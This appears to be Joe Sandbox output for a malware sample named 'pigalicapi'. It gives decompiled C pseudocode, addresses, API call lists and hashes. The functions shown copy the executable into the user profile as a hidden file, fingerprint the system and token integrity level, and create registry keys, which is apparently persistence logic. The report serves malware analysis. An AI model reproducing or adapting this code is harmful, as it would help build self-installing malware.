                                                                                                                                                                                                                                                                            					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						CopyFileA(_a4,  &_v556, 0);
                                                                                                                                                                                                                                                                            						SetFileAttributesA( &_v556, 6);
                                                                                                                                                                                                                                                                            						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v560 = E007B97A0(0x30d);
                                                                                                                                                                                                                                                                            					_v16 = _v560;
                                                                                                                                                                                                                                                                            					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                            					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                            					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                            					_t58 = CreateThread(0, 0, E007B12D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                            					_v288 = _t58;
                                                                                                                                                                                                                                                                            					if(_v288 == 0) {
                                                                                                                                                                                                                                                                            						_v564 = _v16;
                                                                                                                                                                                                                                                                            						E007B97C0(_v564);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						if(_a20 != 0) {
                                                                                                                                                                                                                                                                            							 *_a20 = _v288;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                                            0x007b1129
                                                                                                                                                                                                                                                                            0x007b1134
                                                                                                                                                                                                                                                                            0x007b1168
                                                                                                                                                                                                                                                                            0x007b1175
                                                                                                                                                                                                                                                                            0x007b119b
                                                                                                                                                                                                                                                                            0x007b1177
                                                                                                                                                                                                                                                                            0x007b1182
                                                                                                                                                                                                                                                                            0x007b1182
                                                                                                                                                                                                                                                                            0x007b11bd
                                                                                                                                                                                                                                                                            0x007b11d9
                                                                                                                                                                                                                                                                            0x007b11f0
                                                                                                                                                                                                                                                                            0x007b11ff
                                                                                                                                                                                                                                                                            0x007b1210
                                                                                                                                                                                                                                                                            0x007b1210
                                                                                                                                                                                                                                                                            0x007b1223
                                                                                                                                                                                                                                                                            0x007b122f
                                                                                                                                                                                                                                                                            0x007b1238
                                                                                                                                                                                                                                                                            0x007b1249
                                                                                                                                                                                                                                                                            0x007b125d
                                                                                                                                                                                                                                                                            0x007b1274
                                                                                                                                                                                                                                                                            0x007b127a
                                                                                                                                                                                                                                                                            0x007b1287
                                                                                                                                                                                                                                                                            0x007b12a6
                                                                                                                                                                                                                                                                            0x007b12b3
                                                                                                                                                                                                                                                                            0x007b1289
                                                                                                                                                                                                                                                                            0x007b128d
                                                                                                                                                                                                                                                                            0x007b1298
                                                                                                                                                                                                                                                                            0x007b1298
                                                                                                                                                                                                                                                                            0x007b129a
                                                                                                                                                                                                                                                                            0x007b129a
                                                                                                                                                                                                                                                                            0x007b1287
                                                                                                                                                                                                                                                                            0x007b12c1

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B1148
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B115A
                                                                                                                                                                                                                                                                            • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 007B1182
                                                                                                                                                                                                                                                                              • Part of subcall function 007B97C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B97CF
                                                                                                                                                                                                                                                                              • Part of subcall function 007B97C0: HeapFree.KERNEL32(00000000), ref: 007B97D6
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 007B119B
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 007B11BD
                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000104,?), ref: 007B11D1
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000104,?,00000000), ref: 007B11F0
                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000006), ref: 007B11FF
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000104,?), ref: 007B1210
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,?), ref: 007B1249
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(-00000208,00000000), ref: 007B125D
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,007B12D0,00000000,00000000,00000000), ref: 007B1274
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                            • String ID: %s\%s.exe$/<{$USERPROFILE
                                                                                                                                                                                                                                                                            • API String ID: 1231128424-1083731145
                                                                                                                                                                                                                                                                            • Opcode ID: 13fb26e7fa2d8c114d72ea80db2e2fabd6a4e25b0b6e152676443420f88cd417
                                                                                                                                                                                                                                                                            • Instruction ID: 4a8563abfe507819f4b8d17214611dcdb0687ec1ba70c8a111abcfcf4aeb7278
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13fb26e7fa2d8c114d72ea80db2e2fabd6a4e25b0b6e152676443420f88cd417
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 794121B5A00208EBDB15DFA4DC59FDA77B4BB48700F44C298F60996290D778DA84CFA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                            			E007B5700(CHAR* _a4) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                                                            				long _v560;
                                                                                                                                                                                                                                                                            				void* _v564;
                                                                                                                                                                                                                                                                            				long _v568;
                                                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					E007B8F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                            					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                                            					E007B1CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                            					E007B9D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                            					E007B7B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                            					_t59 = E007B5CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                            					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                            					E007B7D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                            					_v28 = 0x207;
                                                                                                                                                                                                                                                                            					if(( *0x7c435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                            					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                            					_v32 = _t67;
                                                                                                                                                                                                                                                                            					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                            						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                            						if(_v560 > 0) {
                                                                                                                                                                                                                                                                            							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            							_v564 = _t71;
                                                                                                                                                                                                                                                                            							if(_v564 != 0) {
                                                                                                                                                                                                                                                                            								_v568 = 0;
                                                                                                                                                                                                                                                                            								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                            								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                            									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                            									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CloseHandle(_v32);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v5 = 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x007b5709
                                                                                                                                                                                                                                                                            0x007b5711
                                                                                                                                                                                                                                                                            0x007b5729
                                                                                                                                                                                                                                                                            0x007b5742
                                                                                                                                                                                                                                                                            0x007b5756
                                                                                                                                                                                                                                                                            0x007b576e
                                                                                                                                                                                                                                                                            0x007b5786
                                                                                                                                                                                                                                                                            0x007b5798
                                                                                                                                                                                                                                                                            0x007b57a3
                                                                                                                                                                                                                                                                            0x007b57b8
                                                                                                                                                                                                                                                                            0x007b57cc
                                                                                                                                                                                                                                                                            0x007b57d4
                                                                                                                                                                                                                                                                            0x007b57e4
                                                                                                                                                                                                                                                                            0x007b580a
                                                                                                                                                                                                                                                                            0x007b57e6
                                                                                                                                                                                                                                                                            0x007b57f1
                                                                                                                                                                                                                                                                            0x007b57f1
                                                                                                                                                                                                                                                                            0x007b582f
                                                                                                                                                                                                                                                                            0x007b5854
                                                                                                                                                                                                                                                                            0x007b585a
                                                                                                                                                                                                                                                                            0x007b5861
                                                                                                                                                                                                                                                                            0x007b5873
                                                                                                                                                                                                                                                                            0x007b5880
                                                                                                                                                                                                                                                                            0x007b5896
                                                                                                                                                                                                                                                                            0x007b589c
                                                                                                                                                                                                                                                                            0x007b58a9
                                                                                                                                                                                                                                                                            0x007b58ab
                                                                                                                                                                                                                                                                            0x007b58d0
                                                                                                                                                                                                                                                                            0x007b58e2
                                                                                                                                                                                                                                                                            0x007b5912
                                                                                                                                                                                                                                                                            0x007b58e4
                                                                                                                                                                                                                                                                            0x007b58ed
                                                                                                                                                                                                                                                                            0x007b58fc
                                                                                                                                                                                                                                                                            0x007b58fc
                                                                                                                                                                                                                                                                            0x007b58e2
                                                                                                                                                                                                                                                                            0x007b58a9
                                                                                                                                                                                                                                                                            0x007b591c
                                                                                                                                                                                                                                                                            0x007b591c
                                                                                                                                                                                                                                                                            0x007b5922
                                                                                                                                                                                                                                                                            0x007b5922
                                                                                                                                                                                                                                                                            0x007b592c

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: GetVersionExA.KERNEL32(0000009C), ref: 007B8FF7
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: GetSystemInfo.KERNELBASE(?), ref: 007B9009
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 007B902E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: lstrcatA.KERNEL32(00000000,_x64), ref: 007B9222
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: lstrlenA.KERNEL32(?), ref: 007B922F
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: lstrcatA.KERNEL32(00000000,007BC980), ref: 007B9242
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: lstrcatA.KERNEL32(00000000,?), ref: 007B9253
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: lstrlenA.KERNEL32(00000000), ref: 007B925D
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 007B9275
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 007B5742
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007B1CB1
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 007B1CE1
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: GetCurrentProcessId.KERNEL32 ref: 007B1CEE
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 007B1D52
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 007B1D78
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 007B1D92
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007B1DA6
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 007B1DDC
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,007B575B,00000000,?,00000004,00000000), ref: 007B1DFB
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: FindCloseChangeNotification.KERNELBASE(00000000,00000000,-00000204,007B575B,00000000,?,00000004,00000000), ref: 007B1E21
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1CA0: CloseHandle.KERNEL32(000000FF), ref: 007B1E4B
                                                                                                                                                                                                                                                                              • Part of subcall function 007B9D20: GetSystemDirectoryA.KERNEL32 ref: 007B9D9A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B9D20: GetVolumeInformationA.KERNELBASE(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 007B9DDD
                                                                                                                                                                                                                                                                              • Part of subcall function 007B9D20: StringFromCLSID.OLE32(00000020,?), ref: 007B9EF7
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5CD0: lstrlenA.KERNEL32(00000000), ref: 007B5CEB
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5CD0: CreateFileA.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 007B5D10
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 007B5D29
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5CD0: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B5D45
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5CD0: ReadFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 007B5D6D
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B5D99
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5CD0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 007B5DA3
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 007B57B8
                                                                                                                                                                                                                                                                            • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 007B57F1
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 007B580A
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 007B582F
                                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 007B5854
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 007B586D
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B5896
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 007B58D0
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B5912
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007B591C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$lstrcat$CloseVirtuallstrlen$CreateProcess$AllocChangeDirectoryFindFirstFreeHandleModuleNameNotificationProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                            • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                            • API String ID: 560841407-4090404022
                                                                                                                                                                                                                                                                            • Opcode ID: 0207928963fd85861cb4941195fe5898ebbde0172f6d87ec37749c4f7074e550
                                                                                                                                                                                                                                                                            • Instruction ID: 07674aceea230d18105bea8c0abca6b8593eaf392d5b2a57563b91466063d250
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0207928963fd85861cb4941195fe5898ebbde0172f6d87ec37749c4f7074e550
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 265173B0A40208FBDB15DF64DC59FEE7B34AB44705F14C198F6096A2C1D778AA80CFA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                                                                            			E007B99F0() {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				char _v1044;
                                                                                                                                                                                                                                                                            				char _v2068;
                                                                                                                                                                                                                                                                            				long _v2072;
                                                                                                                                                                                                                                                                            				void* _v2076;
                                                                                                                                                                                                                                                                            				void* _v2080;
                                                                                                                                                                                                                                                                            				char _v2084;
                                                                                                                                                                                                                                                                            				int _t43;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v9 = 0;
                                                                                                                                                                                                                                                                            				_v8 = 0x400;
                                                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                                            					return _v9;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v2072 = 0;
                                                                                                                                                                                                                                                                            				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                            				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                                                            					CloseHandle(_v16);
                                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                            				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                            				if(_t43 == 0) {
                                                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                            				_v2084 = 0x44;
                                                                                                                                                                                                                                                                            				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                            				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                            					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                            					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                            						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                            						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                            							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                            							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x007b99f9
                                                                                                                                                                                                                                                                            0x007b99fd
                                                                                                                                                                                                                                                                            0x007b9a19
                                                                                                                                                                                                                                                                            0x007b9b80
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b9b80
                                                                                                                                                                                                                                                                            0x007b9a1f
                                                                                                                                                                                                                                                                            0x007b9a3a
                                                                                                                                                                                                                                                                            0x007b9a4a
                                                                                                                                                                                                                                                                            0x007b9b76
                                                                                                                                                                                                                                                                            0x007b9b7a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b9b7a
                                                                                                                                                                                                                                                                            0x007b9a56
                                                                                                                                                                                                                                                                            0x007b9a77
                                                                                                                                                                                                                                                                            0x007b9a7f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b9a8b
                                                                                                                                                                                                                                                                            0x007b9a91
                                                                                                                                                                                                                                                                            0x007b9aad
                                                                                                                                                                                                                                                                            0x007b9acb
                                                                                                                                                                                                                                                                            0x007b9ae6
                                                                                                                                                                                                                                                                            0x007b9b04
                                                                                                                                                                                                                                                                            0x007b9b1c
                                                                                                                                                                                                                                                                            0x007b9b3a
                                                                                                                                                                                                                                                                            0x007b9b52
                                                                                                                                                                                                                                                                            0x007b9b70
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b9b72
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b9b3c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b9b06
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 007B9A0A
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 007B9A11
                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 007B9A3A
                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 007B9A77
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 007B9AAD
                                                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(?,00000000), ref: 007B9AC3
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 007B9AE6
                                                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(?), ref: 007B9AFC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 007B9B7A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                            • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                            • Opcode ID: 705315244323e69c79317bbc671406b20dc52309a0e015773b5802b0077f8162
                                                                                                                                                                                                                                                                            • Instruction ID: 5985bf44e40077571e0686c864c2da998900859e8c6673667b9cfcbaed18e0ee
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 705315244323e69c79317bbc671406b20dc52309a0e015773b5802b0077f8162
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A410FB5A0021CEBDB20DB94DC45FDAB3BDBF48700F00C1E8E65996290DB749A42DFA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 751 7b5a00-7b5a12 752 7b5a18-7b5a1c 751->752 753 7b5b44-7b5b4b 751->753 752->753 754 7b5a22-7b5a26 752->754 754->753 755 7b5a2c-7b5a86 call 7b7d20 lstrcpyA call 7b5930 call 7b7d20 lstrlenA 754->755 755->753 762 7b5a8c-7b5ab9 lstrcpyA lstrlenA * 2 755->762 762->753 763 7b5abf-7b5b08 lstrcatA RegCreateKeyExA 762->763 764 7b5b0a-7b5b14 RegCloseKey 763->764 765 7b5b16-7b5b31 call 7b7d20 lstrcpyA 763->765 766 7b5b37-7b5b41 lstrlenA 764->766 765->766 766->753
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B5A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                                                            				CHAR* _t35;
                                                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                                                            				long _t43;
                                                                                                                                                                                                                                                                            				CHAR* _t51;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                            					E007B7D20(_t27, "Qawoqmsckgkay", 0, 0xe);
                                                                                                                                                                                                                                                                            					lstrcpyA("Qawoqmsckgkay", "WDefault");
                                                                                                                                                                                                                                                                            					_t33 = E007B5930(_a4 + 0x45b, "Qawoqmsckgkay", 0xd); // executed
                                                                                                                                                                                                                                                                            					E007B7D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                            					_t35 =  *0x7c189c; // 0x7bc4e0
                                                                                                                                                                                                                                                                            					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                            						_t51 =  *0x7c189c; // 0x7bc4e0
                                                                                                                                                                                                                                                                            						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                            						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                            						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                            							lstrcatA(_a8, "Qawoqmsckgkay");
                                                                                                                                                                                                                                                                            							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                            							_v16 = 0;
                                                                                                                                                                                                                                                                            							_v20 = 0;
                                                                                                                                                                                                                                                                            							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                            							if(_t43 != 0) {
                                                                                                                                                                                                                                                                            								E007B7D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                            								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v8 = lstrlenA(_a8);
